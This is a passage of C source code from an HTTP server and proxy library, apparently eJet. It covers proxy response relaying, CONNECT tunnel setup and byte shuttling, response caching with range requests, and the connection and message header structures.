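   settings, add Server/Date/Accept-Ranges headers when missing, encode the
   response header and mark the client message as issued. Does nothing if the
   client message has already been issued. */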
int http_proxy_climsg_dup (void * vsrvmsg)
{
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
HTTPMgmt * mgmt = NULL;
HTTPMsg * climsg = NULL;
HeaderUnit * punit = NULL;
int i, num;
int ret = 0;
if (!srvmsg) return -1;
climsg = (HTTPMsg *)srvmsg->proxymsg;
if (!climsg) return -2;
mgmt = (HTTPMgmt *)srvmsg->httpmgmt;
if (!mgmt) return -3;
if (climsg->issued) return 0;
/* set status code */
climsg->SetStatus(climsg, srvmsg->res_status, NULL);
/* duplicate all the response headers into client msg */
num = arr_num(srvmsg->res_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(srvmsg->res_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
http_header_append(climsg, 1, HUName(punit), punit->namelen,
HUValue(punit), punit->valuelen);
}
climsg->res_body_flag = srvmsg->res_body_flag;
climsg->res_body_length = srvmsg->res_body_length;
climsg->res_conn_keepalive = srvmsg->res_conn_keepalive;
climsg->res_store_file = srvmsg->res_store_file;
srvmsg->cacheon = climsg->cacheon;
if (http_header_get(climsg, 1, "Server", 6) == NULL)
http_header_append(climsg, 1, "Server", 6, mgmt->useragent, str_len(mgmt->useragent));
if (http_header_get(climsg, 1, "Date", 4) == NULL)
http_header_append_date(climsg, 1, "Date", 4, time(NULL));
if (http_header_get(climsg, 1, "Accept-Ranges", 13) == NULL)
http_header_append(climsg, 1, "Accept-Ranges", 13, "bytes", 5);
if (climsg->cacheon && climsg->res_cache_info) {
http_cache_response_header(climsg, climsg->res_cache_info);
}
ret = http_res_encoding(climsg);
if (ret < 0) {
http_msg_close(climsg);
return -100;
}
climsg->issued = 1;
climsg->state = HTTP_MSG_REQUEST_HANDLED;
return 0;
}
int http_proxy_cli_send (void * vclicon, void * vclimsg)
{
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPMsg * climsg = (HTTPMsg *)vclimsg;
HTTPCon * srvcon = NULL;
HTTPMsg * srvmsg = NULL;
HTTPChunk * chunk = NULL;
frame_t * frm = NULL;
uint8 isend = 0;
int ret;
int rcvslen = 0;
uint8 * pbgn = NULL;
int num = 0;
if (!clicon) return -1;
if (!climsg) return -2;
srvmsg = climsg->proxymsg;
if (!srvmsg) return -3;
srvcon = srvmsg->pcon;
if (!srvcon) return -4;
if (climsg->proxied != 1) return -10;
if (srvmsg->proxied != 2) return -11;
frm = srvcon->rcvstream;
pbgn = frameP(frm);
num = frameL(frm);
if (num > 0) {
arr_push(climsg->res_rcvs_list, frm);
srvcon->rcvstream = frame_new(8192);
}
chunk = (HTTPChunk *)climsg->res_chunk;
if (srvmsg->res_body_flag == BC_CONTENT_LENGTH &&
srvmsg->res_body_length - climsg->res_body_iolen > 0 && num > 0)
{
/* remaining body to be sent */
rcvslen = srvmsg->res_body_length - climsg->res_body_iolen;
rcvslen = min(num, rcvslen);
srvmsg->res_body_iolen += rcvslen;
climsg->res_body_iolen += rcvslen;
srvmsg->res_stream_recv += rcvslen;
isend = climsg->res_body_iolen >= srvmsg->res_body_length ? 1 : 0;
if (rcvslen > 0) {
chunk_add_bufptr(climsg->res_body_chunk, pbgn, rcvslen, frm);
}
} else if (srvmsg->res_body_flag == BC_TE && num > 0) {
ret = http_chunk_add_bufptr(chunk, pbgn, num, &rcvslen);
isend = chunk->gotall;
if (ret >= 0 && rcvslen > 0) {
chunk_add_bufptr(climsg->res_body_chunk, pbgn, rcvslen, frm);
}
srvmsg->res_body_iolen += rcvslen;
climsg->res_body_iolen += rcvslen;
srvmsg->res_stream_recv += rcvslen;
} else if (srvmsg->res_body_flag == BC_NONE || srvmsg->res_body_length == 0) {
isend = 1;
}
if (isend && num > rcvslen) {
frame_put_nfirst(srvcon->rcvstream, pbgn + rcvslen, num - rcvslen);
}
if (isend) {
/* all data from origin server are received. srvmsg can be closed now! */
http_con_msg_del(srvcon, srvmsg);
http_msg_close(srvmsg);
srvcon->rcv_state = HTTP_CON_READY;
chunk_set_end(climsg->res_body_chunk);
} else {
srvcon->rcv_state = HTTP_CON_WAITING_BODY;
}
return http_cli_send(clicon);
}
int http_proxy_srvbody_del (void * vsrvcon, void * vsrvmsg)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
int num = 0;
int bodylen = 0;
uint8 * pbgn = NULL;
int ret = 0;
HTTPChunk * chunk = NULL;
if (!srvcon) return -1;
if (!srvmsg) return -2;
if (srvmsg->proxied != 2) return -11;
if (srvmsg != http_con_msg_first(srvcon))
return -100;
pbgn = frameP(srvcon->rcvstream);
num = frameL(srvcon->rcvstream);
if (srvmsg->res_body_flag == BC_CONTENT_LENGTH) {
bodylen = srvmsg->res_body_length - srvmsg->res_stream_sent;
if (bodylen <= num) {
frame_del_first(srvcon->rcvstream, bodylen);
srvmsg->res_stream_sent += bodylen;
return 1; //body removed completely
} else {
frame_del_first(srvcon->rcvstream, num);
srvmsg->res_stream_sent += num;
return 0; //body is not enough
}
} else if (srvmsg->res_body_flag == BC_TE) {
chunk = (HTTPChunk *)srvmsg->res_chunk;
ret = http_chunk_add_bufptr(srvmsg->res_chunk, pbgn, num, &bodylen);
if (ret >= 0 && bodylen > 0) {
frame_del_first(srvcon->rcvstream, bodylen);
srvmsg->res_stream_sent += bodylen;
}
if (chunk->gotall) {
return 1;
} else {
return 0;
}
}
return 1;
}
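/* Establish the server side of an HTTP CONNECT tunnel: mark the client connection
   as a tunnel endpoint, detect whether the requested destination is this server
   itself, and otherwise open a new connection to the destination host and link
   the two HTTPCon instances to each other. Returns the tunnel connection or NULL. */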
void * http_proxy_connect_tunnel (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPCon * tunnelcon = NULL;
if (!pcon || !msg) return NULL;
if (pcon->httptunnel && pcon->tunnelcon)
return pcon->tunnelcon;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return NULL;
/* set the tunnel flag for client-side HTTPCon */
pcon->httptunnel = 1;
pcon->tunnelcon = NULL;
msg->dstport = msg->req_port;
/* check whether the destination server of the HTTP CONNECT request is this server itself */
if (http_listen_check_self(msg->httpmgmt,
msg->req_host,
msg->req_hostlen,
msg->dstip, msg->dstport) > 0)
{
pcon->tunnelself = 1;
return NULL;
}
tunnelcon = http_con_open(NULL, msg->dstip, msg->dstport, 0);
if (tunnelcon) {
iodev_workerid_set(tunnelcon->pdev, 1);
tunnelcon->httptunnel = 2;
tunnelcon->tunnelcon = pcon;
tunnelcon->tunnelconid = pcon->conid;
pcon->tunnelcon = tunnelcon;
pcon->tunnelconid = tunnelcon->conid;
return tunnelcon;
}
return NULL;
}
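/* Note (descriptive summary added for clarity): once http_proxy_connect_tunnel() succeeds,
   the two connections are cross-linked: the client-side HTTPCon carries httptunnel=1 and
   tunnelcon pointing at the origin-side HTTPCon, while the origin-side HTTPCon carries
   httptunnel=2 and tunnelcon pointing back at the client side. The two relay functions
   below simply shuttle the raw bytes buffered in one side's rcvstream to the peer connection. */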
int http_tunnel_srv_send (void * vclicon, void * vsrvcon)
{
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMgmt * mgmt = NULL;
int sentnum = 0;
int ret = 0;
struct iovec iov[4];
int iovcnt = 0;
if (!clicon) return -1;
if (!srvcon) return -2;
mgmt = (HTTPMgmt *)clicon->mgmt;
if (!mgmt) return -3;
if (clicon->httptunnel != 1 && clicon->tunnelcon != srvcon)
return -10;
if (srvcon->httptunnel != 2 && srvcon->tunnelcon != clicon)
return -11;
if (frameL(clicon->rcvstream) <= 0)
return 0;
if (srvcon->snd_state < HTTP_CON_SEND_READY) {
iodev_add_notify(srvcon->pdev, RWF_WRITE);
return 0;
}
iov[iovcnt].iov_base = frameP(clicon->rcvstream);
iov[iovcnt].iov_len = frameL(clicon->rcvstream);
iovcnt++;
ret = http_con_writev(srvcon, iov, iovcnt, &sentnum, NULL);
if (ret < 0) {
return -200;
}
time(&srvcon->stamp);
frame_del_first(clicon->rcvstream, sentnum);
if (frameL(clicon->rcvstream) > 0) {
iodev_add_notify(srvcon->pdev, RWF_WRITE);
}
if (sentnum > 0)
http_srv_send_cc(srvcon);
return sentnum;
}
int http_tunnel_cli_send (void * vsrvcon, void * vclicon)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPMgmt * mgmt = NULL;
int sentnum = 0;
int ret = 0;
struct iovec iov[4];
int iovcnt = 0;
if (!srvcon) return -1;
if (!clicon) return -2;
mgmt = (HTTPMgmt *)srvcon->mgmt;
if (!mgmt) return -3;
if (srvcon->httptunnel != 2 && srvcon->tunnelcon != clicon)
return -10;
if (clicon->httptunnel != 1 && clicon->tunnelcon != srvcon)
return -11;
if (frameL(srvcon->rcvstream) <= 0)
return 0;
if (clicon->snd_state < HTTP_CON_SEND_READY) {
iodev_add_notify(clicon->pdev, RWF_WRITE);
return 0;
}
iov[iovcnt].iov_base = frameP(srvcon->rcvstream);
iov[iovcnt].iov_len = frameL(srvcon->rcvstream);
iovcnt++;
ret = http_con_writev(clicon, iov, iovcnt, &sentnum, NULL);
if (ret < 0) {
return -200;
}
time(&clicon->stamp);
time(&srvcon->stamp);
frame_del_first(srvcon->rcvstream, sentnum);
if (frameL(srvcon->rcvstream) > 0) {
iodev_add_notify(clicon->pdev, RWF_WRITE);
}
if (sentnum > 0)
http_cli_send_cc(clicon);
return sentnum;
}
int http_proxy_cli_cache_send (void * vclicon, void * vclimsg)
{
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPMsg * climsg = (HTTPMsg *)vclimsg;
CacheInfo * cacinfo = NULL;
int64 reqpos = 0;
int64 bodysize = 0;
int64 restlen = 0;
int64 datapos = 0;
int64 datalen = 0;
int64 ilen = 0;
int ret = 0;
static int CHUNKLEN = 1024*1024;
if (!clicon) return -1;
if (!climsg) return -2;
cacinfo = (CacheInfo *)climsg->res_cache_info;
if (!cacinfo) {
return http_proxy_cli_send(clicon, climsg);
}
/* multiple HTTPMsg instances are allowed in the HTTPCon queue and are handled as a pipeline */
if (climsg != http_con_msg_first(clicon)) {
return -100;
}
if (climsg->issued <= 0) {
return 0;
}
bodysize = chunk_size(climsg->res_body_chunk, 0);
bodysize -= climsg->res_header_length;
reqpos = climsg->cache_req_start + bodysize;
if (climsg->res_body_flag == BC_CONTENT_LENGTH) {
/* calculate length of remaining data to send */
restlen = climsg->res_body_length - bodysize;
if (restlen <= 0) goto sendnow;
ret = frag_pack_contain(cacinfo->frag, reqpos, -1, &datapos, &datalen, NULL, NULL);
if (ret >= 2) {
/* clamp the contiguous cached data length to the remaining length to send */
if (datalen > restlen) datalen = restlen;
ret = chunk_add_file(climsg->res_body_chunk, cacinfo->cache_tmp, datapos, datalen, 1);
if (chunk_size(climsg->res_body_chunk, 0) >= climsg->res_body_length + climsg->res_header_length) {
chunk_set_end(climsg->res_body_chunk);
}
} else {
/* no data exists at this position in the cache; the range must be requested from the origin server */
if (climsg->proxymsg == NULL &&
frag_pack_complete(cacinfo->frag) <= 0 &&
http_request_in_cache(climsg) <= 0)
{
http_proxy_srv_cache_send(climsg);
}
}
} else if (climsg->res_body_flag == BC_TE) {
ret = frag_pack_contain(cacinfo->frag, reqpos, -1, &datapos, &datalen, NULL, NULL);
if (ret >= 2) {
for (ilen = 0; datalen > 0; ) {
if (datalen > CHUNKLEN) {
ret = chunk_add_file(climsg->res_body_chunk, cacinfo->cache_tmp, datapos + ilen, CHUNKLEN, 0);
ilen += CHUNKLEN;
datalen -= CHUNKLEN;
} else {
ret = chunk_add_file(climsg->res_body_chunk, cacinfo->cache_tmp, datapos + ilen, datalen, 0);
ilen += datalen;
datalen = 0;
}
if (chunk_size(climsg->res_body_chunk, 1) > 50*1024*1024) break;
}
if (datalen == 0 && http_chunk_gotall(climsg->res_chunk)) {
/* all available data from this position of the raw cache file has been added into the chunk,
   and the full response body of the proxy request to the origin has been received. */
chunk_set_end(climsg->res_body_chunk);
}
} else {
/* no data exists at this position in the cache; the range must be requested from the origin server */
if (climsg->proxymsg == NULL &&
frag_pack_complete(cacinfo->frag) <= 0 &&
http_request_in_cache(climsg) <= 0)
{
http_proxy_srv_cache_send(climsg);
}
}
}
sendnow:
bodysize = chunk_size(climsg->res_body_chunk, climsg->res_body_flag == BC_TE ? 1 : 0);
if (climsg->res_stream_sent < bodysize)
http_cli_send(clicon);
return 1;
}
int http_proxy_srv_cache_store (void * vsrvcon, void * vsrvmsg)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
HTTPCon * clicon = NULL;
HTTPMsg * climsg = NULL;
HTTPMgmt * mgmt = NULL;
CacheInfo * cacinfo = NULL;
char * pbody = NULL;
int bodylen = 0;
int wlen = 0;
int64 filepos = 0;
int64 restlen = 0;
int ret, rmlen = 0;
uint8 justsaveit = 0;
if (!srvcon) return -1;
if (!srvmsg) return -2;
climsg = srvmsg->proxymsg;
if (!climsg) return -3;
clicon = climsg->pcon;
if (!clicon) return -4;
mgmt = (HTTPMgmt *)climsg->httpmgmt;
if (!mgmt) return -5;
if (climsg->proxied != 1) return -10;
if (srvmsg->proxied != 2) return -11;
cacinfo = (CacheInfo *)climsg->res_cache_info;
if (!cacinfo) {
return http_proxy_cli_send(clicon, climsg);
}
/* multiple HTTPMsg instances are allowed in the HTTPCon queue and are handled as a pipeline */
if (climsg != http_con_msg_first(clicon)) {
justsaveit = 1;
}
pbody = frameP(srvcon->rcvstream);
bodylen = frameL(srvcon->rcvstream);
if (climsg->res_body_flag == BC_CONTENT_LENGTH) {
restlen = climsg->res_body_length - climsg->res_body_iolen;
if (restlen <= 0) {
/* got all body content of the current request, but possibly not all the file content */
chunk_set_end(climsg->res_body_chunk);
climsg->proxymsg = NULL;
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
goto clisend;
}
srvcon->rcv_state = HTTP_CON_WAITING_BODY;
if (bodylen <= 0) goto clisend;
if (restlen <= bodylen)
bodylen = restlen;
#if defined(_WIN32) || defined(_WIN64)
filepos = native_file_offset(climsg->res_file_handle);
#else
filepos = lseek(native_file_fd(climsg->res_file_handle), 0, SEEK_CUR);
#endif
wlen = native_file_write(climsg->res_file_handle, pbody, bodylen);
if (wlen > 0) {
frame_del_first(srvcon->rcvstream, wlen);
climsg->res_body_iolen += wlen;
cache_info_add_frag(cacinfo, filepos, wlen, 0);
}
if (climsg->res_body_iolen >= climsg->res_body_length) {
/* got all body content of the current request, but possibly not all the file content */
climsg->proxymsg = NULL;
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
}
} else if (climsg->res_body_flag == BC_TE) {
if (http_chunk_gotall(climsg->res_chunk)) {
/* got all body content of the current request, but possibly not all the file content */
chunk_set_end(climsg->res_body_chunk);
climsg->proxymsg = NULL;
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
goto clisend;
}
srvcon->rcv_state = HTTP_CON_WAITING_BODY;
if (bodylen <= 0) goto clisend;
ret = http_chunk_add_bufptr(climsg->res_chunk, pbody, bodylen, &rmlen);
if (ret < 0) return -30;
if (rmlen <= 0) goto clisend;
#if defined(_WIN32) || defined(_WIN64)
filepos = native_file_offset(climsg->res_file_handle);
#else
filepos = lseek(native_file_fd(climsg->res_file_handle), 0, SEEK_CUR);
#endif
/* the parsed body content, with the hex-length\r\n chunk framing stripped, will be written into the cache file */
wlen = restlen = chunk_rest_size(http_chunk_obj(climsg->res_chunk), 0);
climsg->res_body_iolen += restlen;
climsg->res_body_length += restlen;
chunk_readto_file(http_chunk_obj(climsg->res_chunk),
native_file_fd(climsg->res_file_handle), 0, -1, 0);
chunk_remove(http_chunk_obj(climsg->res_chunk), climsg->res_body_length, 0);
frame_del_first(srvcon->rcvstream, rmlen);
if (http_chunk_gotall(climsg->res_chunk)) {
/* got all body content of the current request, but possibly not all the file content */
climsg->proxymsg = NULL;
/* add the fragment segment to the cache info and check whether all of the content has been received */
cache_info_add_frag(cacinfo, filepos, restlen, 1);
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
goto clisend;
} else {
cache_info_add_frag(cacinfo, filepos, restlen, 0);
}
}
clisend:
if (!justsaveit) {
http_proxy_cli_cache_send(clicon, climsg);
}
return 0;
}
void * http_proxy_srv_cache_send (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMsg * srvmsg = NULL;
HeaderUnit * punit = NULL;
CacheInfo * cacinfo = NULL;
int i, num;
char buf[512];
int ret = 0;
if (!msg) return NULL;
srvmsg = http_msg_fetch(msg->httpmgmt);
if (!srvmsg) return NULL;
srvmsg->SetMethod(srvmsg, "GET", 3);
srvmsg->SetURL(srvmsg, msg->fwdurl, msg->fwdurllen, 1);
srvmsg->req_url_type = msg->req_url_type;
srvmsg->dstport = srvmsg->req_port;
str_cpy(srvmsg->srcip, msg->srcip);
srvmsg->srcport = msg->srcport;
/* duplicate all the request headers into proxy msg */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
if (strncasecmp(HUName(punit), "User-Agent", 10) == 0) {
str_secpy(buf, sizeof(buf)-1, HUValue(punit), punit->valuelen);
snprintf(buf + strlen(buf), sizeof(buf)-1-strlen(buf), " via eJet/%s", g_http_version);
http_header_append(srvmsg, 0, HUName(punit), punit->namelen, buf, strlen(buf));
} else {
http_header_append(srvmsg, 0, HUName(punit), punit->namelen,
HUValue(punit), punit->valuelen);
}
}
cacinfo = (CacheInfo *)msg->res_cache_info;
if (cacinfo) {
http_header_del(srvmsg, 0, "Range", -1);
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "bytes=%I64d-", msg->cache_req_off);
#else
sprintf(buf, "bytes=%lld-", msg->cache_req_off);
#endif
if (msg->cache_req_len > 0 &&
msg->cache_req_off + msg->cache_req_len < cacinfo->body_length)
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf+strlen(buf), "%I64d", msg->cache_req_off + msg->cache_req_len - 1);
#else
sprintf(buf+strlen(buf), "%lld", msg->cache_req_off + msg->cache_req_len - 1);
#endif
http_header_append(srvmsg, 0, "Range", -1, buf, strlen(buf));
}
if (http_header_get(msg, 0, "Connection", -1) == NULL) {
http_header_append(srvmsg, 0, "Connection", -1, "keep-alive", -1);
}
http_header_del(srvmsg, 0, "Content-Length", -1);
http_header_del(srvmsg, 0, "Content-Type", -1);
http_header_del(srvmsg, 0, "Transfer-Encoding", 17);
srvmsg->req_body_flag = BC_NONE;
srvmsg->req_body_length = 0;
srvmsg->req_multipart = 0;
srvmsg->req_conn_keepalive = 1;
ret = http_req_encoding(srvmsg, 0);
if (ret < 0) {
http_msg_close(srvmsg);
return NULL;
}
srvmsg->proxied = 2;
srvmsg->proxymsg = msg;
srvmsg->ploc = msg->ploc;
srvmsg->phost = msg->phost;
srvmsg->state = HTTP_MSG_SENDING;
msg->proxymsg = srvmsg;
if (http_srv_msg_dns(srvmsg, http_srv_msg_dns_cb) < 0) {
http_msg_close(srvmsg);
return NULL;
}
return srvmsg;
}
<|start_filename|>include/http_con.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CON_H_
#define _HTTP_CON_H_
#include "http_listen.h"
#include "http_msg.h"
#ifdef HAVE_OPENSSL
#include <openssl/ssl.h>
#include <openssl/err.h>
#endif
#ifdef __cplusplus
extern "C" {
#endif
/* HTTP Method Constants Definition */
#define HTTP_METHOD_NONE 0
#define HTTP_METHOD_CONNECT 1
#define HTTP_METHOD_DELETE 2
#define HTTP_METHOD_GET 3
#define HTTP_METHOD_HEAD 4
#define HTTP_METHOD_VERSION_10 5
#define HTTP_METHOD_VERSION_11 6
#define HTTP_METHOD_OPTIONS 7
#define HTTP_METHOD_POST 8
#define HTTP_METHOD_PUT 9
#define HTTP_METHOD_TRACE 10
/* timer command ids that identify the timeout event type */
#define t_http_srv_con_build 2120
#define t_http_cli_con_life 2121
#define t_http_srv_con_life 2122
/* HTTP connection automation state definition for HTTP Receiving (Request or Response) */
#define HTTP_CON_NULL 0
#define HTTP_CON_READY 1
#define HTTP_CON_SSL_HANDSHAKING 2
#define HTTP_CON_RECVING 3
#define HTTP_CON_WAITING_HEADER 4
#define HTTP_CON_WAITING_BODY 5
/* HTTP connection automation state definition for HTTP Sending (Request or Response) */
#define HTTP_CON_IDLE 0
#define HTTP_CON_CONNECTING 10
#define HTTP_CON_SEND_READY 11
#define HTTP_CON_FEEDING 12
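/* A plausible progression of these states, inferred from the call sites rather than stated
   anywhere authoritatively: on the receive side an accepted connection moves from READY,
   optionally through SSL_HANDSHAKING, to WAITING_HEADER and WAITING_BODY, and returns to
   READY once the message is complete; on the send side an outgoing connection moves from
   IDLE through CONNECTING to SEND_READY, with FEEDING used while a body is being streamed. */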
typedef struct http_con {
void * res[2];
HTTPListen * hl;
uint8 casetype;
RequestDiag * reqdiag;
void * reqdiagobj;
ulong conid;
int rcv_state;
int snd_state;
/* when accepting a client request, srcip is the client-side IP and
   dstip is this server's own IP.
   when sending an http request by connecting to an origin server, dstip is the origin server's IP. */
char srcip[41];
int srcport;
char dstip[41];
int dstport;
/* reading or writing data by following socket communication facilities */
CRITICAL_SECTION rcvCS;
void * pdev;
#ifdef HAVE_OPENSSL
SSL_CTX * sslctx;
SSL * ssl;
#endif
struct http_con * tunnelcon;
ulong tunnelconid;
int read_ignored;
frame_p rcvstream;
void * ready_timer;
time_t stamp;
time_t createtime;
time_t transbgn;
void * life_timer;
unsigned retrytimes : 4;
unsigned reqnum : 10;
unsigned resnum : 10;
unsigned keepalive : 1;
unsigned ssl_link : 1;
unsigned ssl_handshaked : 1;
/* sending a request and receiving its response is treated as one transaction.
   the transact flag indicates whether the connection is currently in such a transaction.
   0-idle 1-sending request or waiting for response */
unsigned transact : 1;
unsigned httptunnel : 2;
unsigned tunnelself : 1;
/* client request HTTPMsg instance */
HTTPMsg * msg;
/* multiple requests may occur over a single tcp connection; responses
 * should be pipelined back to the client in request order */
arr_t * msg_list;
CRITICAL_SECTION msglistCS;
/* system management instance */
void * pcore;
void * mgmt;
void * srv;
} HTTPCon;
int http_con_cmp_http_con(void * a, void * b);
int http_con_cmp_conid (void * a, void * pat);
ulong http_con_hash_func (void * key);
/* http connection instance release/initialize/recycle routines */
int http_con_init (void * vcon);
int http_con_free (void * vcon);
int http_con_recycle (void * vcon);
void * http_con_fetch (void * vmgmt);
void * http_con_open (void * vsrv, char * dstip, int dstport, int ssl_link);
int http_con_close (void * vcon);
int http_con_connect (void * vpcon);
int http_con_connected (void * vpcon);
char * http_con_srcip (void * vcon);
int http_con_srcport (void * vcon);
int http_con_reqnum (void * vcon);
ulong http_con_id (void * vcon);
void * http_con_iodev (void * vcon);
int http_con_msg_add (void * vcon, void * vmsg);
int http_con_msg_del (void * vcon, void * vmsg);
void * http_con_msg_first (void * vcon);
void * http_con_msg_last (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_msg.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_MSG_H_
#define _HTTP_MSG_H_
#include "http_uri.h"
#ifdef __cplusplus
extern "C" {
#endif
typedef int RecvAllNotify (void * vmsg, void * para, void * cbval, int status);
typedef int TearDownNotify (void * vmsg, void * para);
#define REUSE_BUF_THRESHOLD 64*1024
/* how the Request/Response body content is delimited or recognized.
 * several cases are defined to identify the body */
#define BC_NONE 0
#define BC_CONTENT_LENGTH 1
#define BC_TE 2
#define BC_TE_INVALID 3
#define BC_UNKNOWN 4
#define BC_TUNNEL 5
/* HTTPMsg state definition when acting as HTTPServer, HTTPProxy, HTTPGateway */
#define HTTP_MSG_NULL 0
#define HTTP_MSG_REQUEST_RECVING 1
#define HTTP_MSG_REQUEST_HANDLING 2
#define HTTP_MSG_REQUEST_HANDLED 3
#define HTTP_MSG_RESPONSE_SENDING 4
#define HTTP_MSG_REQUEST_SENDING 5
#define HTTP_MSG_REQUEST_SENT 6
#define HTTP_MSG_RESPONSE_RECVING 7
#define HTTP_MSG_RESPONSE_HANDLING 8
#define HTTP_MSG_OVER 17
/* HTTPMsg state definition when acting as HTTPClient */
#define HTTP_MSG_SENDING 10
#define HTTP_MSG_SENT 11
#define HTTP_MSG_RECVING_RESP 12
#define HTTP_MSG_RECV_END 13
/* http partial request header format as following:
Range: bytes=0-499 #given range from 0 to 499, total 500 bytes
Range: bytes=500- #given range from 500 to end, total bytes: size-500
Range: bytes=-200 #indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 #given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
typedef struct http_partial_s {
/* 1 - bytes=0-499,700-900
2 - bytes=500-
3 - bytes=-200
0 - unknown */
uint8 partflag;
int64 start;
int64 end;
int64 length;
int64 fsize;
} http_partial_t;
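/* Illustrative mapping (an assumption about how the parser fills these fields, not taken
   from the source): "Range: bytes=500-999" would give partflag 1, start 500, end 999,
   length 500; "Range: bytes=-200" would give partflag 3 with length 200, where start and
   end can only be resolved once the file size fsize is known. */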
typedef struct http_msg {
void * res[2];
/* globally unique identifier for the HTTPMsg */
ulong msgid;
uint8 msgtype; /* 0-sending request 1-receiving request */
void * hl;
void * phost;
void * ploc;
int locinst_times;
void * cbobj;
hashtab_t * script_var_tab;
/* variables instantiated from HTTPLoc and HTTPHost when the HTTPMsg is created */
int matchnum;
ckstr_t matchstr[16];
char * root;
/* current message handling state */
int state;
time_t createtime;
time_t stamp;
/* client request and server response ip address of wap proxy system */
char srcip[41];
int srcport;
char dstip[41];
int dstport;
uint8 ssl_link;
/* flag indicating whether the request has been sent to the server or not */
uint8 reqsent;
uint8 redirecttimes;
uint8 req_url_type; //0-relative 1-absolute
http_uri_t * uri;
http_uri_t * absuri;
http_uri_t * docuri;
/* the following elements form the request line. they are
 * assigned by the invoker that wants to send the request.
 * these elements are the original data from which the request is constructed. */
int req_methind;
char req_meth[16];
char req_ver[16];
int req_ver_major;
int req_ver_minor;
/* the following elements are parsed as pointers into the corresponding locations of msg->uri */
char * req_scheme;
int req_schemelen;
char * req_host;
int req_hostlen;
uint16 req_port;
char * req_path;
int req_pathlen;
char * req_query;
int req_querylen;
char * req_line;
int req_line_len;
char * req_content_type;
int req_contype_len;
char * req_useragent;
int req_useragent_len;
char * req_cookie;
int req_cookie_len;
/* variables for http-request receiving management */
int64 req_header_length;
int64 req_body_length;
int64 req_body_iolen;
uint8 req_chunk_state;
int64 req_chunk_iolen;
int64 req_chunk_size;
/* when the request body is too large to hold in memory,
 * the body content is stored in a temporary file */
uint8 req_multipart;
uint8 req_file_cache;
char * req_file_name;
void * req_file_handle;
/* 0-no body 1-Content-Length body 2-Transfer-Encoding body 3-unknown body */
uint8 req_body_flag;
uint8 req_conn_keepalive;
/* the headers are made up of many HeaderUnits. these units are
 * generated by the invoker that wants to send the request.
 * they are the original data from which the request is constructed */
hashtab_t * req_header_table;
arr_t * req_header_list;
hashtab_t * req_cookie_table;
/* the following members are the data buffers that the elements above (request line, headers)
 * point into. */
frame_p req_header_stream;
frame_p req_body_stream;
frame_p req_stream;
void * req_chunk;
chunk_t * req_body_chunk;
int64 req_stream_sent;
int64 req_stream_recv;
/* by adopting zero-copy for higher performance, the frame buffers of the HTTPCon, which store
   octets read from the socket, are moved to the following list for further parsing or handling
   when receiving octets from the client connection and forwarding them to the origin server.
   this significantly reduces the overhead of memory copying. */
arr_t * req_rcvs_list;
/* if content type of POST request is multipart form, every part is stored in list */
arr_t * req_formlist;
void * req_form_json;
void * req_form_kvobj;
void * req_query_kvobj;
/* TCP connection instance for the reading/writing of HTTP Request/Response */
void * pcon;
ulong conid;
ulong workerid;
/* redirect the request to a new URL with status code 302/301 */
uint8 redirected;
/* indicate current HTTPMsg is proxied to another origin server */
uint8 proxied : 4; //0-no proxy 1-original request 2-proxying request
uint8 cacheon : 4;
struct http_msg * proxymsg;
/* indicates the msg is forwarded via FastCGI to a FastCGI Process Manager server */
uint8 fastcgi; //0-no fastcgi 1-send to FastCGI server
void * fcgimsg;
uint8 fcgi_resend;
char * fwdurl;
int fwdurllen;
/* determine if the requested host is reached via proxy */
char * proxy;
int proxyport;
//0-no partial,
uint8 partial_flag;
void * partial_list;
uint8 flag304; //not modified content, just return 304
/* flag indicating whether the application has issued the response to the client
   or the request to the server */
int issued;
/* the first line of response contains following information. */
char res_ver[16];
int res_status;
uint32 res_verloc;
int res_verlen;
uint32 res_statusloc;
int res_statuslen;
uint32 res_reasonloc;
int res_reasonlen;
frame_p res_line;
/* the number of header/body octets received from server or high layer */
int64 res_header_length;
int64 res_body_length;
int64 res_body_iolen;
/* based on the caching configuration and the cache policy carried in the origin server response,
   the response body is cached into res_file_name and the caching information is stored
   in res_cache_info. */
char * res_file_name;
void * res_file_handle;
uint8 res_file_cache;
int64 cache_req_start;
int64 cache_req_off;
int64 cache_req_len;
